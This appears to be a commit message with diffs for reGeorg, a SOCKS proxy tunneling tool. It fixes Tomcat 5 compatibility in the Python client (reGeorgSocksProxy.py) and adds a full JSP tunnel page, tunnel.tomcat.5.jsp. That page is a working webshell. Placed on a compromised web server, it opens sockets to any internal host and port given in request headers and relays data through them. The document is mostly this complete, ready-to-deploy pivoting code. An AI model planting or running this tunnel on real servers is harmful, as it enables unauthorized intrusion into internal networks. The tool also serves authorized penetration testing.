Ok, I had some friends ask about some compatiblilty issues relating t…

…o Tomcat 5.x (Yes, a 10 year old Tomcat)

I've added a slight (actually its horrible) hack based on webserver header (I'll fix it propperly laterer)
Also needed to create a new tunnel servlet, named tunnel.tomcat.5.jsp. I've tested it on tomcat 5 on windows xp
and it seemed to work just fine, some external feedback would be awesome!

reGeorgSocksProxy.py

@@ -267,6 +267,12 @@ def reader(self):
                         if response.getheader("set-cookie") != None:
                             cookie = response.getheader("set-cookie")
                         data = response.data
+                        # Yes I know this is horrible, but its a quick fix to issues with tomcat 5.x bugs that have been reported, will find a propper fix laters
+                        try:
+                            if response.getheader("server").find("Apache-Coyote/1.1") > 0:
+                                data = data[:len(data)-1]
+                        except:
+                            pass
                         if data == None: data=""
                     else:
                         data = None
@@ -306,7 +312,7 @@ def writer(self):
                         if response.getheader("set-cookie") != None:
                             self.cookie = response.getheader("set-cookie")
                     else:
-                        log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target,response.status,status,response.getheader("x-error")))
+                        log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target,self.port,response.status,status,response.getheader("x-error")))
                         break
                 else: 
                     log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target,self.port,response.status))
@@ -366,7 +372,7 @@ def askGeorg(connectString):
     conn = httpScheme(host=httpHost, port=httpPort)
     response = conn.request("GET", httpPath)
     if response.status == 200:
-        if BASICCHECKSTRING == response.data:
+        if BASICCHECKSTRING == response.data.strip():
             log.info(BASICCHECKSTRING)
             return True
     conn.close()

tunnel.tomcat.5.jsp

@@ -0,0 +1,111 @@
+<%/*
+                     _____                                    
+  _____   ______  __|___  |__  ______  _____  _____   ______  
+ |     | |   ___||   ___|    ||   ___|/     \|     | |   ___| 
+ |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  | 
+ |__|\__\|______||______|  __||______|\_____/|__|\__\|______| 
+                    |_____|
+                    ... every office needs a tool like Georg
+                    
+  willem@sensepost.com / @_w_m__
+  sam@sensepost.com / @trowalts
+  etienne@sensepost.com / @kamp_staaldraad
+
+Legal Disclaimer
+Usage of reGeorg for attacking networks without consent
+can be considered as illegal activity. The authors of
+reGeorg assume no liability or responsibility for any
+misuse or damage caused by this program.
+
+If you find reGeorge on one of your servers you should
+consider the server compromised and likely further compromise
+to exist within your internal network.
+
+For more information, see:
+https://github.com/sensepost/reGeorg
+
+*/%><%@page import="java.nio.ByteBuffer, java.net.InetSocketAddress, java.nio.channels.SocketChannel, java.util.Arrays, java.io.IOException, java.net.UnknownHostException, java.net.Socket" %><%
+    String cmd = request.getHeader("X-CMD");
+    if (cmd != null) {
+        response.setHeader("X-STATUS", "OK");
+        if (cmd.compareTo("CONNECT") == 0) {
+            try {
+                String target = request.getHeader("X-TARGET");
+                int port = Integer.parseInt(request.getHeader("X-PORT"));
+                SocketChannel socketChannel = SocketChannel.open();
+                socketChannel.connect(new InetSocketAddress(target, port));
+                socketChannel.configureBlocking(false);
+                session.setAttribute("socket", socketChannel);
+                response.setHeader("X-STATUS", "OK");
+            } catch (UnknownHostException e) {
+                System.out.println(e.getMessage());
+                response.setHeader("X-ERROR", e.getMessage());
+                response.setHeader("X-STATUS", "FAIL");
+            } catch (IOException e) {
+                System.out.println(e.getMessage());
+                response.setHeader("X-ERROR", e.getMessage());
+                response.setHeader("X-STATUS", "FAIL");
+                
+            }
+        } else if (cmd.compareTo("DISCONNECT") == 0) {
+            SocketChannel socketChannel = (SocketChannel)session.getAttribute("socket");
+            try{
+                socketChannel.socket().close();
+            } catch (Exception ex) {
+                System.out.println(ex.getMessage());
+            }
+            session.invalidate();
+        } else if (cmd.compareTo("READ") == 0){
+            SocketChannel socketChannel = (SocketChannel)session.getAttribute("socket");
+            try {            
+                ByteBuffer buf = ByteBuffer.allocate(512);
+                int bytesRead = socketChannel.read(buf);
+                ServletOutputStream so = response.getOutputStream();
+                while (bytesRead > 0){
+                    so.write(buf.array(),0,bytesRead);
+                    so.flush();
+                    buf.clear();
+                    bytesRead = socketChannel.read(buf);
+                }
+                response.setHeader("X-STATUS", "OK");
+                so.flush();
+                so.close();            
+                
+            } catch (Exception e) {
+                System.out.println(e.getMessage());
+                response.setHeader("X-ERROR", e.getMessage());
+                response.setHeader("X-STATUS", "FAIL");
+                //socketChannel.socket().close();
+            }        
+            
+        } else if (cmd.compareTo("FORWARD") == 0){
+            SocketChannel socketChannel = (SocketChannel)session.getAttribute("socket");
+            try {
+                
+                int readlen = request.getContentLength();
+                byte[] buff = new byte[readlen];
+
+                request.getInputStream().read(buff, 0, readlen);
+                ByteBuffer buf = ByteBuffer.allocate(readlen);
+                buf.clear();
+                buf.put(buff);
+                buf.flip();
+
+                while(buf.hasRemaining()) {
+                    socketChannel.write(buf);
+                }
+                response.setHeader("X-STATUS", "OK");
+                //response.getOutputStream().close();
+                
+            } catch (Exception e) {
+                System.out.println(e.getMessage());
+                response.setHeader("X-ERROR", e.getMessage());
+                response.setHeader("X-STATUS", "FAIL");
+                socketChannel.socket().close();
+            }
+        } 
+    } else {
+        //PrintWriter o = response.getWriter();  
+        out.print("Georg says, 'All seems fine'");  
+    }
+%>